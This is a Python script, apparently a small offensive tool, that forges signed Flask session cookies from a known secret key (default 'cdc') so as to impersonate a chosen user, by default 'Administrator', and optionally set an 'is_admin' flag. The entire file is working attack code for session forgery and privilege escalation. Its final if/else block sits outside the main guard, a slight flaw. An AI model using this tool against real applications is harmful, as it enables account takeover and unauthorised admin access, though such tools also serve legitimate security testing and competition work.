from flask.sessions import SecureCookieSessionInterface
from flask import Flask
import sys

DEFAULT_SECRET_KEY = "cdc"
DEFAULT_ACCOUNT = "Administrator"

def forge_flask_cookie(secret_key, user,is_admin=False):
    app = Flask(__name__)
    app.secret_key = secret_key
    impersonation_payload = {}
    if is_admin:
        impersonation_payload = {
            "username": f"{user}",
            "is_admin": True
        }
    else:
        impersonation_payload = {"username":f"{user}"}
    serializer = SecureCookieSessionInterface().get_signing_serializer(app)
    if serializer is None:
        return "Failed to create serializer"
    return serializer.dumps(impersonation_payload)




if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Flask Session Cookie Forging Tool")
    parser.add_argument("-u", "--user", default=DEFAULT_ACCOUNT, help="User to impersonate")
    parser.add_argument("-s","--secret", default=DEFAULT_SECRET_KEY,help="Secret key for encoding flask sessions")
    parser.add_argument("--admin",default=False,help="make user admin")
    args = parser.parse_args()

#impersonation_cookie = forge_flask_cookie(args.secret, impersonation_payload)
if args.admin:
    print(f"Admin cookie for '{args.user}': {forge_flask_cookie(args.secret, args.user,args.admin)}")
else:
    print(f"Basic cookie for '{args.user}': {forge_flask_cookie(args.secret, args.user)}")

